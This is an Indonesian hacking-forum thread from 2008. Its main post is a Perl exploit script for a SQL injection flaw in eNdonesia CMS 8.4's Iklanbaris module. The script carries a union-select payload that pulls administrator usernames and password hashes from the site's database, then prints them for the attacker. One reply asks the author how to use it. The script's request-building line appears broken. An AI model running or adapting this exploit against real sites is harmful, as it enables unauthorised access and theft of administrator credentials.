Tempat ngumpulnya anak Himatika Perbanas
 
IndeksPortailCalendarFAQAnggotaGroupPencarianPendaftaranLogin

Share | 
 

 eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
yadoy666
Script Learner
Script Learner


Jumlah posting : 121
Registration date : 20.09.07

PostSubyek: eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi   Thu Aug 28, 2008 8:16 pm

Code:
#!/usr/bin/perl
#=====================================================
#[x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit
#[x] Vendor : http://www.endonesia.org/
#[x] Bug : mod.php?mod=iklanbaris&op=viewlink&cid
#[x] Bugs Found at : 01-08-2008
#[x] Bugs Found By : YaDoY666
#[x] Author Blogs : http://yadoy666.blogspot.com/
#[x] Greets : Jack, n0c0py, odod, Jery Maheswara, x-sari, m4rtincornelis
#=====================================================
use HTTP::Request;
use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=iklanbaris&op=viewlink&cid=";
$sql_injection ="-1/**/union+select/**/000,concat(aid,0x3a,pwd),666/**/from+authors/*where admin 1";

if(!@ARGV) { &help;exit(1);}
sub help(){
print "\n [x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit\n";
print " [x]===============================================\n";
print " [x] Use : perl $0 http://www.target.com/n";
print " [x] Dont use \"http:///";
print " [x] Exploit By : YaDoY666 http://yadoy666.blogspot.com/ \n";
print " [x]===============================================\n";
print " [x] YogyaFree - MainHack BrotherHood - Echo - Jasakom \n\n";
print " [x] http://www.yadoy666.blogspot.com/n/n";
}

while (){
my $target = $ARGV[0];
my $exploit = "http:///;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
exit(0);
}
else {
die " [error] Fail to get username and password.\n\n";
}
}
else {
die " [error] Fail to inject $target \n\n";
}
}

#Blogz Nya YaDoY666
#http://yadoy666.blogspot.com
Kembali Ke Atas Go down
Lihat profil user http://yadoy666.blogspot.com
Hardc0py
Noobies
Noobies


Jumlah posting : 13
Registration date : 19.11.08

PostSubyek: Re: eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi   Wed Nov 19, 2008 12:33 am

wah bang yadoy gmn tuh cara gunain n mengerti tuh source code nya,,,

ajarin dunk,,,,

masih bingung bgt n ga ngerti,,

thx b'4
Kembali Ke Atas Go down
Lihat profil user
 
eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» jual Rugi CDi BRT Remote 24step New 1750 aja
» WTS :Honda RVC 212 Repsol Stoner limited ( Remote Control )
» FS : RC Mobile Kyosho Model AMG Mclaren Touring 1:10 with Engines, Brg Gress Baru....
» Mau Pasang Alarm Ninja 250? Silahkan Masuk
» Alarm motor two ways system type "SPY 5000"

Permissions in this forum:Anda tidak dapat menjawab topik
Himatika Perbanas :: Interaksi Forum Pilihan :: Forum Membahas Semua Jenis Hacking-
Navigasi: